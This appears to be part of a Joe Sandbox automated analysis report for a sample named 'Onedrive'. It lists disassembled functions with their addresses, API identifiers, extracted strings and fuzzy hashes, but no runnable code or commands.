259->260 261 7ff63ea1e725 259->261 260->261 261->238
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.4146149164.00007FF63EA11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF63EA10000, based on PE: true
                                                    • Associated: 00000004.00000002.4146124314.00007FF63EA10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146176721.00007FF63EA21000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146201120.00007FF63EA26000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146223529.00007FF63EA27000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ff63ea10000_Onedrive.jbxd
                                                    Similarity
                                                    • API ID: CurrentImageInfoNonwritableSleepStartup_amsg_exit_cexit_inittermexit
                                                    • String ID:
                                                    • API String ID: 642454821-0
                                                    • Opcode ID: dcccb8e6faa13e6eb85182caefda4e784d42338a70b9cfa3f9f0163e6fa78336
                                                    • Instruction ID: be5c9ca9df0c844b083f542c23a0190c441087b42ce9a8cc4f92fae068a91f81
                                                    • Opcode Fuzzy Hash: dcccb8e6faa13e6eb85182caefda4e784d42338a70b9cfa3f9f0163e6fa78336
                                                    • Instruction Fuzzy Hash: 88616935E0A74682FB608B52E94023936A1FFB4780F548035F94EE37A4DF3CE959A720
                                                    Function 00007FFDF3B00510 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 72COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    APIs
                                                    • __vcrt_lock.LIBVCRUNTIMED ref: 00007FFDF3B005CF
                                                      • Part of subcall function 00007FFDF3AF6620: EnterCriticalSection.KERNEL32(?,?,?,?,00007FFDF3AE8375,?,?,?,?,00007FFDF3AE8062), ref: 00007FFDF3AF6641
                                                    • __vcrt_lock.LIBVCRUNTIMED ref: 00007FFDF3B00656
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.4146268479.00007FFDF3AD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFDF3AD0000, based on PE: true
                                                    • Associated: 00000004.00000002.4146247530.00007FFDF3AD0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146311346.00007FFDF3B12000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146340380.00007FFDF3B28000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146362300.00007FFDF3B2D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ffdf3ad0000_Onedrive.jbxd
                                                    Similarity
                                                    • API ID: __vcrt_lock$CriticalEnterSection
                                                    • String ID: %ls$__acrt_lowio_ensure_fh_exists$minkernel\crts\ucrt\src\appcrt\lowio\osfinfo.cpp$static_cast<unsigned>(fh) < _NHANDLE_
                                                    • API String ID: 3216741998-2342959244
                                                    • Opcode ID: ae640927d60817160271a2714da284d25e7b7308b8c6acd019e82179aa0bfa48
                                                    • Instruction ID: 0e03d864107a89abab63f9b91338d429aef4cffc13d3c7b4c15a307d2db8ebe6
                                                    • Opcode Fuzzy Hash: ae640927d60817160271a2714da284d25e7b7308b8c6acd019e82179aa0bfa48
                                                    • Instruction Fuzzy Hash: 9B3118B2B1C64296E7109B10E4B4B6A7661FB80344F921135E6EE6B6DDDF7CE544CB00
                                                    Function 00007FFDF3AD15E0 Relevance: 6.1, APIs: 4, Instructions: 110threadinjectionCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.4146268479.00007FFDF3AD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFDF3AD0000, based on PE: true
                                                    • Associated: 00000004.00000002.4146247530.00007FFDF3AD0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146311346.00007FFDF3B12000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146340380.00007FFDF3B28000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146362300.00007FFDF3B2D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ffdf3ad0000_Onedrive.jbxd
                                                    Similarity
                                                    • API ID: Thread$Context$CloseHandleOpen
                                                    • String ID:
                                                    • API String ID: 3699202265-0
                                                    • Opcode ID: d4c4d1f31c04e89d8440c4e2001154f5e439df317c5423af91eed40023814fc9
                                                    • Instruction ID: aafe7137966436c984b103009cbe39935b7021c0f089132cff1e042f288c6915
                                                    • Opcode Fuzzy Hash: d4c4d1f31c04e89d8440c4e2001154f5e439df317c5423af91eed40023814fc9
                                                    • Instruction Fuzzy Hash: AC51C332A14BC185E320CF61ED502DDB7FCFBA5388F11531AEA9856EA9DF7492A0C740
                                                    Function 00007FFDF3B002D0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 93COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    APIs
                                                    • Concurrency::details::_Scheduler::_Scheduler.LIBCMTD ref: 00007FFDF3B00300
                                                      • Part of subcall function 00007FFDF3AD39B0: __crt_scoped_stack_ptr.LIBCPMTD ref: 00007FFDF3AD39BE
                                                      • Part of subcall function 00007FFDF3AD85F0: __crt_unique_heap_ptr.LIBCMTD ref: 00007FFDF3AD85FE
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.4146268479.00007FFDF3AD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFDF3AD0000, based on PE: true
                                                    • Associated: 00000004.00000002.4146247530.00007FFDF3AD0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146311346.00007FFDF3B12000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146340380.00007FFDF3B28000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146362300.00007FFDF3B2D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ffdf3ad0000_Onedrive.jbxd
                                                    Similarity
                                                    • API ID: Concurrency::details::_SchedulerScheduler::___crt_scoped_stack_ptr__crt_unique_heap_ptr
                                                    • String ID: minkernel\crts\ucrt\src\appcrt\lowio\osfinfo.cpp
                                                    • API String ID: 1054307577-534659383
                                                    • Opcode ID: bf5abb50213b255653cb25fdc270292517b4292bdca5e9645a15d9283761075a
                                                    • Instruction ID: 82d42737ad8f9500deb437b4c7c644f3848af35165be1349b87482bc0566ae9d
                                                    • Opcode Fuzzy Hash: bf5abb50213b255653cb25fdc270292517b4292bdca5e9645a15d9283761075a
                                                    • Instruction Fuzzy Hash: FF414C2272DB8085D780CB1AE0A176EBB60F7C5794F551126FADE5BBE9CF2DC5418B00
                                                    Function 00007FFDF3AD1590 Relevance: 3.0, APIs: 2, Instructions: 18COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.4146268479.00007FFDF3AD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFDF3AD0000, based on PE: true
                                                    • Associated: 00000004.00000002.4146247530.00007FFDF3AD0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146311346.00007FFDF3B12000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146340380.00007FFDF3B28000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146362300.00007FFDF3B2D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ffdf3ad0000_Onedrive.jbxd
                                                    Similarity
                                                    • API ID: CriticalExceptionHandlerInitializeSectionVectored
                                                    • String ID:
                                                    • API String ID: 1918240263-0
                                                    • Opcode ID: fb6ecdb09215081dff59cbbde18696c7f37c7dd433215ad7ce397aa92e144a44
                                                    • Instruction ID: 894388678ce14353df4bc4088432d32bbf20b4e8cbdf43b163356a76f4bba088
                                                    • Opcode Fuzzy Hash: fb6ecdb09215081dff59cbbde18696c7f37c7dd433215ad7ce397aa92e144a44
                                                    • Instruction Fuzzy Hash: 56E048A4F0960382FB05D715EC7977422A1BF14304FC20139D47D993D4DF2DD4568700
                                                    Function 00007FFDF3AF1190 Relevance: 3.0, APIs: 2, Instructions: 17COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    APIs
                                                    • __vcrt_lock.LIBVCRUNTIMED ref: 00007FFDF3AF1199
                                                      • Part of subcall function 00007FFDF3AF6620: EnterCriticalSection.KERNEL32(?,?,?,?,00007FFDF3AE8375,?,?,?,?,00007FFDF3AE8062), ref: 00007FFDF3AF6641
                                                    • __vcrt_lock.LIBVCRUNTIMED ref: 00007FFDF3AF11C4
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.4146268479.00007FFDF3AD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFDF3AD0000, based on PE: true
                                                    • Associated: 00000004.00000002.4146247530.00007FFDF3AD0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146311346.00007FFDF3B12000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146340380.00007FFDF3B28000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146362300.00007FFDF3B2D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ffdf3ad0000_Onedrive.jbxd
                                                    Similarity
                                                    • API ID: __vcrt_lock$CriticalEnterSection
                                                    • String ID:
                                                    • API String ID: 3216741998-0
                                                    • Opcode ID: 1eb003dd854b58748907cb2f28eedebdd14ecbd62e688982f457d1efa163928a
                                                    • Instruction ID: 83281132cdbf87c8e2d8c379dd69dca696f127b088d4760c24358575fc9b9d99
                                                    • Opcode Fuzzy Hash: 1eb003dd854b58748907cb2f28eedebdd14ecbd62e688982f457d1efa163928a
                                                    • Instruction Fuzzy Hash: FFE04600F0C2C281F36972728432BBA29406F41308F460238EAAD2C2DFCE1CE1108726
                                                    Function 00007FFDF3AD1550 Relevance: 3.0, APIs: 2, Instructions: 15COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.4146268479.00007FFDF3AD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFDF3AD0000, based on PE: true
                                                    • Associated: 00000004.00000002.4146247530.00007FFDF3AD0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146311346.00007FFDF3B12000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146340380.00007FFDF3B28000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146362300.00007FFDF3B2D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ffdf3ad0000_Onedrive.jbxd
                                                    Similarity
                                                    • API ID: CriticalDeleteExceptionHandlerRemoveSectionVectored
                                                    • String ID:
                                                    • API String ID: 1384964762-0
                                                    • Opcode ID: 5603965f67bc51f021bb451bf859e20d88480dca11bf105668d04a671e603702
                                                    • Instruction ID: 9bc4b3cac77a0264a31b12cc67aed0c7a29ef10601ac984ce63066ee31c72b76
                                                    • Opcode Fuzzy Hash: 5603965f67bc51f021bb451bf859e20d88480dca11bf105668d04a671e603702
                                                    • Instruction Fuzzy Hash: EBD01798F0A40385FB46AF62DCB8AB02350AF54700FC60234C87EE92D8DE1CE68A8700
                                                    Function 00007FFDF3AD1860 Relevance: 1.6, APIs: 1, Instructions: 69threadCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.4146268479.00007FFDF3AD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFDF3AD0000, based on PE: true
                                                    • Associated: 00000004.00000002.4146247530.00007FFDF3AD0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146311346.00007FFDF3B12000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146340380.00007FFDF3B28000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146362300.00007FFDF3B2D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ffdf3ad0000_Onedrive.jbxd
                                                    Similarity
                                                    • API ID: CurrentThread
                                                    • String ID:
                                                    • API String ID: 2882836952-0
                                                    • Opcode ID: d8a67680f0db511946e090e78dcfaad3c4524fee8cf677f73070562d12118055
                                                    • Instruction ID: 4029b55b395979ca5c666d06cd371b57a9e047fe13cdbe6ea1d48d7cd5cac38d
                                                    • Opcode Fuzzy Hash: d8a67680f0db511946e090e78dcfaad3c4524fee8cf677f73070562d12118055
                                                    • Instruction Fuzzy Hash: CB217F25B0874381F7928B5395A49797290FF44B84F5A4235EE6EAB7D8DF3CE4418600
                                                    Function 00007FFDF3AEB500 Relevance: 1.5, APIs: 1, Instructions: 41COMMONLIBRARYCODE
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.4146268479.00007FFDF3AD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFDF3AD0000, based on PE: true
                                                    • Associated: 00000004.00000002.4146247530.00007FFDF3AD0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146311346.00007FFDF3B12000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146340380.00007FFDF3B28000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146362300.00007FFDF3B2D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ffdf3ad0000_Onedrive.jbxd
                                                    Similarity
                                                    • API ID: _get_purecall_handler
                                                    • String ID:
                                                    • API String ID: 2826984366-0
                                                    • Opcode ID: ad07be3e6c2b22536b3f255321fe498e304bc87f9b5340cb5d734495a9b1ccba
                                                    • Instruction ID: ebe6b81a4cc0704bb4e8cbb7fe2efae11800df10f98539698dd93299ae84fb77
                                                    • Opcode Fuzzy Hash: ad07be3e6c2b22536b3f255321fe498e304bc87f9b5340cb5d734495a9b1ccba
                                                    • Instruction Fuzzy Hash: E011216261C78185E3209B57B054B6EBBA0E794384F050135FEEE5AADDDF6CD580CF10
                                                    Function 00007FFDF3AD2039 Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.4146268479.00007FFDF3AD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFDF3AD0000, based on PE: true
                                                    • Associated: 00000004.00000002.4146247530.00007FFDF3AD0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146311346.00007FFDF3B12000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146340380.00007FFDF3B28000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146362300.00007FFDF3B2D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ffdf3ad0000_Onedrive.jbxd
                                                    Similarity
                                                    • API ID: __security_init_cookie
                                                    • String ID:
                                                    • API String ID: 1916132197-0
                                                    • Opcode ID: 1ea7b90c7907bc48940007c29d94137a28260e46411c2c610252b12d6915dafa
                                                    • Instruction ID: 08d31af19c78d93c1c24ebe4520c020ffacb9086f728ce166d3a414b6ef80d17
                                                    • Opcode Fuzzy Hash: 1ea7b90c7907bc48940007c29d94137a28260e46411c2c610252b12d6915dafa
                                                    • Instruction Fuzzy Hash: 90C08C3AA2918282C340A712E0528EA7320FFC5780F402121FB4E2378ECE2CD4008A00

                                                    Non-executed Functions

                                                    Function 00007FF63EA1892C Relevance: 45.7, APIs: 23, Strings: 3, Instructions: 218threadCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.4146149164.00007FF63EA11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF63EA10000, based on PE: true
                                                    • Associated: 00000004.00000002.4146124314.00007FF63EA10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146176721.00007FF63EA21000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146201120.00007FF63EA26000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146223529.00007FF63EA27000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ff63ea10000_Onedrive.jbxd
                                                    Similarity
                                                    • API ID: memset$CloseErrorHandleLastProcessThreadWindow
                                                    • String ID: %windir%\ImmersiveControlPanel\SystemSettings.exe$2F8FA37B-8158-476F-9B22-3283D2A6FEC2$A0BB30C7-DEC2-4BFD-AF5F-DC6612D74584
                                                    • API String ID: 3504613239-2751644673
                                                    • Opcode ID: 4b6fd73fe6a43ca1d551fd65e3bdd0a8ed6c5294c22ee6cbe672d89829c46d4f
                                                    • Instruction ID: 86fc18aff94638cb7b11323e44af982ffb3e01a4cb1265b4e42625d4112279d0
                                                    • Opcode Fuzzy Hash: 4b6fd73fe6a43ca1d551fd65e3bdd0a8ed6c5294c22ee6cbe672d89829c46d4f
                                                    • Instruction Fuzzy Hash: 01A15432A08B4287E7149B62E8502B97BE1FFB9B81F458135EA4ED7790DF3CD4499720
                                                    Function 00007FF63EA11F10 Relevance: 31.6, APIs: 3, Strings: 15, Instructions: 134COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.4146149164.00007FF63EA11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF63EA10000, based on PE: true
                                                    • Associated: 00000004.00000002.4146124314.00007FF63EA10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146176721.00007FF63EA21000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146201120.00007FF63EA26000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146223529.00007FF63EA27000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ff63ea10000_Onedrive.jbxd
                                                    Similarity
                                                    • API ID: DirectElement@$Descendent@ElementFindFreeListener@Listener@2@@TaskV12@
                                                    • String ID: CallNumber$IIDText$Instructions$Number1$Number2$Number3$Number4$Number5$Number6$Number7$Number8$Number9$PrivacyLink$TollFree$TollMain
                                                    • API String ID: 4084670624-4122676257
                                                    • Opcode ID: de347effb7d31f4abd0a984043735bca1e7089a22e8b78f18e1b4c452233c240
                                                    • Instruction ID: 58fe5081600924ae890da09d2331276513a441b5b2456aaf18470d9c6e08fb59
                                                    • Opcode Fuzzy Hash: de347effb7d31f4abd0a984043735bca1e7089a22e8b78f18e1b4c452233c240
                                                    • Instruction Fuzzy Hash: 95511A60B0DB5B82FE14D7A6E8905B51691AFB9784F405031EA0EDB396EE6CF50CB730
                                                    Function 00007FFDF3AEBDC0 Relevance: 26.7, APIs: 2, Strings: 13, Instructions: 461COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.4146268479.00007FFDF3AD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFDF3AD0000, based on PE: true
                                                    • Associated: 00000004.00000002.4146247530.00007FFDF3AD0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146311346.00007FFDF3B12000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146340380.00007FFDF3B28000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146362300.00007FFDF3B2D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ffdf3ad0000_Onedrive.jbxd
                                                    Similarity
                                                    • API ID: new[]
                                                    • String ID: %ls$Client hook re-allocation failure at file %hs line %d.$Client hook re-allocation failure.$Error: memory allocation: bad memory block type.$Error: memory allocation: bad memory block type.Memory allocated at %hs(%d).$Error: possible heap corruption at or near 0x%p$The Block at 0x%p was allocated by aligned routines, use _aligned_realloc()$_CrtIsValidHeapPointer(block)$__acrt_first_block == old_head$__acrt_last_block == old_head$minkernel\crts\ucrt\src\appcrt\heap\debug_heap.cpp$old_head->_line_number == line_number_for_ignore_blocks && old_head->_request_number == request_number_for_ignore_blocks$reallocation_is_allowed || (!reallocation_is_allowed && new_head == old_head)
                                                    • API String ID: 4059295235-458177602
                                                    • Opcode ID: b5581433664bbf5574ad46b3204ba3e9f57dab964faa428365c5c575a416aa92
                                                    • Instruction ID: f157aeb2a1900539a179eabaf2b32d8dbe84aac806843b1fb360491aae64459f
                                                    • Opcode Fuzzy Hash: b5581433664bbf5574ad46b3204ba3e9f57dab964faa428365c5c575a416aa92
                                                    • Instruction Fuzzy Hash: A1322036B0CB8585E760CB16E460B6A77A1FB88790F514135DAAD9BBE8DF3CD580CB00
                                                    Function 00007FF63EA1A33C Relevance: 26.5, APIs: 14, Strings: 1, Instructions: 226memoryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.4146149164.00007FF63EA11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF63EA10000, based on PE: true
                                                    • Associated: 00000004.00000002.4146124314.00007FF63EA10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146176721.00007FF63EA21000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146201120.00007FF63EA26000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146223529.00007FF63EA27000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ff63ea10000_Onedrive.jbxd
                                                    Similarity
                                                    • API ID: FreeHeap$Local$Process$AllocCloseInformationLicensingOpenStatus
                                                    • String ID: UXDifferentiator
                                                    • API String ID: 3977053813-2471664420
                                                    • Opcode ID: 9044375e2e7989267fff8dfc678b0600364f32c011c0966404f9a2e3441f9e71
                                                    • Instruction ID: b75ab6efe7fcd7c738d06fecb199493bcbb8b8b6b7d6033096ce6d9a4b5f867a
                                                    • Opcode Fuzzy Hash: 9044375e2e7989267fff8dfc678b0600364f32c011c0966404f9a2e3441f9e71
                                                    • Instruction Fuzzy Hash: F7A16D32A08B428AEB118FA1E4403BD7BB1FBA9798F144535EE0E97754DF38E4499760
                                                    Function 00007FF63EA15E74 Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 152filememorylibraryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.4146149164.00007FF63EA11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF63EA10000, based on PE: true
                                                    • Associated: 00000004.00000002.4146124314.00007FF63EA10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146176721.00007FF63EA21000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146201120.00007FF63EA26000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146223529.00007FF63EA27000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ff63ea10000_Onedrive.jbxd
                                                    Similarity
                                                    • API ID: Heap$Free$Process$ErrorLast$FileLibrarySetup$CloseDirectoryLoadOpenSystem
                                                    • String ID: TapiCodes$tapiGetLocationInfo
                                                    • API String ID: 3084871228-3986397507
                                                    • Opcode ID: 624e032ff8f8052b215d109ab565f33b61593328c3df89e529d95a6be9fd6c6c
                                                    • Instruction ID: 1c604f90dea9df7f1836d97472bf17bfd26903443179acbc6a2c392f0519afb8
                                                    • Opcode Fuzzy Hash: 624e032ff8f8052b215d109ab565f33b61593328c3df89e529d95a6be9fd6c6c
                                                    • Instruction Fuzzy Hash: 5B517221B18A8286FB149FA2A4002B967A0FFB5B95F459135FD1ED7784DF3CE4099720
                                                    Function 00007FFDF3AF7470 Relevance: 18.2, APIs: 12, Instructions: 212fileCOMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.4146268479.00007FFDF3AD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFDF3AD0000, based on PE: true
                                                    • Associated: 00000004.00000002.4146247530.00007FFDF3AD0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146311346.00007FFDF3B12000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146340380.00007FFDF3B28000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146362300.00007FFDF3B2D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ffdf3ad0000_Onedrive.jbxd
                                                    Similarity
                                                    • API ID: Container_base12Container_base12::~_std::_$FileFind$Concurrency::details::_FirstNextSchedulerScheduler::__wcsupr_stype_info::_name_internal_method
                                                    • String ID:
                                                    • API String ID: 1493447076-0
                                                    • Opcode ID: cc861cbe94f13b17584c7a37f6fbde71b82270591c4d13bf4b386e749a55bb7e
                                                    • Instruction ID: 37243d04dc8eac2e32c91ebe9f9b52a20ae997987db00a0c17f5df5904415266
                                                    • Opcode Fuzzy Hash: cc861cbe94f13b17584c7a37f6fbde71b82270591c4d13bf4b386e749a55bb7e
                                                    • Instruction Fuzzy Hash: 75B12E2671CBC181DB60DB26E4A07AEB364FBC4780F510132E69D9AAE9DF2DD5458B00
                                                    Function 00007FFDF3AEAD91 Relevance: 17.9, Strings: 14, Instructions: 414COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.4146268479.00007FFDF3AD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFDF3AD0000, based on PE: true
                                                    • Associated: 00000004.00000002.4146247530.00007FFDF3AD0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146311346.00007FFDF3B12000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146340380.00007FFDF3B28000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146362300.00007FFDF3B2D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ffdf3ad0000_Onedrive.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: %ls$Client hook free failure.$HEAP CORRUPTION DETECTED: after %hs block (#%d) at 0x%p.CRT detected that the application wrote to memory after end of heap buffer.$HEAP CORRUPTION DETECTED: after %hs block (#%d) at 0x%p.CRT detected that the application wrote to memory after end of heap buffer.Memory allocated at %hs(%d).$HEAP CORRUPTION DETECTED: before %hs block (#%d) at 0x%p.CRT detected that the application wrote to memory before start of heap buffer.$HEAP CORRUPTION DETECTED: before %hs block (#%d) at 0x%p.CRT detected that the application wrote to memory before start of heap buffer.Memory allocated at %hs(%d).$The Block at 0x%p was allocated by aligned routines, use _aligned_free()$_CrtIsValidHeapPointer(block)$__acrt_first_block == header$__acrt_last_block == header$header->_block_use == block_use || header->_block_use == _CRT_BLOCK && block_use == _NORMAL_BLOCK$header->_line_number == line_number_for_ignore_blocks && header->_request_number == request_number_for_ignore_blocks$is_block_type_valid(header->_block_use)$minkernel\crts\ucrt\src\appcrt\heap\debug_heap.cpp
                                                    • API String ID: 0-3956125450
                                                    • Opcode ID: 42c07789950f123e8db84fb944ed052ae9ea2649d9af8cc015498c765690b2ed
                                                    • Instruction ID: 0723cca30eb7500c637c1cf5095e53ffa094dcf474caecfdd6148edf84a6d2bd
                                                    • Opcode Fuzzy Hash: 42c07789950f123e8db84fb944ed052ae9ea2649d9af8cc015498c765690b2ed
                                                    • Instruction Fuzzy Hash: 7322303670CB4586E760CB56E4A0B6AB7A4FB88790F510136DA9D9BBACDF7CD540CB00
                                                    Function 00007FF63EA18E4C Relevance: 17.6, APIs: 14, Instructions: 101memoryCOMMON
                                                    Download Yara Rule
